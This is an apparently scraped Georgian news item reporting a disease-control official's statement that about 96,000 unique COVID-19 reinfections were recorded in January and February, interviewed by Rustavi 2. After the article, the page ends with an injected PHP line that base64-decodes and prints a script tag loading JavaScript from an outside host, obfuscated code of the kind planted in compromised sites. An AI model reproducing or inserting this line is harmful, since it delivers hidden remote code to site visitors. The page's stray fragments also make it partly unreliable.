celsiusi
ავერსი საქკაბელი
ქვეყანაში მხოლოდ იანვარ-თებერვალში, კორონავირუსით რეინფიცირების 96 000 უნიკალური შემთხვევა დაფიქსირდა, - ამის შესახებ დაავადებათა კონტროლის ეროვნული ცენტრის დირექტორმა ამირან გამყრელიძემ "რუსთავი 2"-თან ინტერვიუში განაცხადა.
 
მისივე თქმით, რეინფიცირების შემთხვევები დაფიქსირდა პირებში, ვისაც ერთხელ, ორჯერ და სამჯერ ჰქონდა კორონავირუსი გადატანილი.
 
"96 000-მდე უნიკალურ ადამიანში, იანვარ-თებერვალში გვაქვს რეინფიცირება, თვითონ რეინფიცირების რიცხვი, რა თქმა უნდა, მეტია.
 
გვაქვს ერთხელ რეინფიცირების შემთხვევები, ძირითადად ასეთია ანუ როცა ერთხელ იყო დაინფიცირებული და მეორედ დაინფიცირდა; გვაქვს ორჯერადი რეინფიცირება, როცა ადამიანი ორჯერ იყო ინფიცირებული და, ასევე, ძალიან გამონაკლის შემთხვევებში - სამჯერ დაიფიცირებულებიც," - აცხადებს ამირან გამყრელიძე.
814
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");